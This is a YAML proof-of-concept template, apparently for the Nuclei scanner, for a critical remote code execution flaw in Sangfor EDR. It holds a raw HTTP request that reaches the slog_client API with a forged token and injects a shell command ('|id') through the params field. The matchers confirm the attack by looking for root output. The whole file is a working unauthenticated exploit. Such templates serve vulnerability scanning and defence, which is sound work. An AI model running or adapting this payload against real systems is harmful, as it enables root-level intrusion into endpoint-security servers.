id: poc-yaml-sangfor-edr-cssp-rce

info:
  name: poc-yaml-sangfor-edr-cssp-rce
  author: x1n9Qi8
  severity: critical
  tags: xray-converted,rce,ct-158113
  reference:
    - https://www.cnblogs.com/0day-li/p/13650452.html

http:
  - raw:
      - |
        POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"params":"w=123\"'1234123'\"|id"}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "uid=0(root)"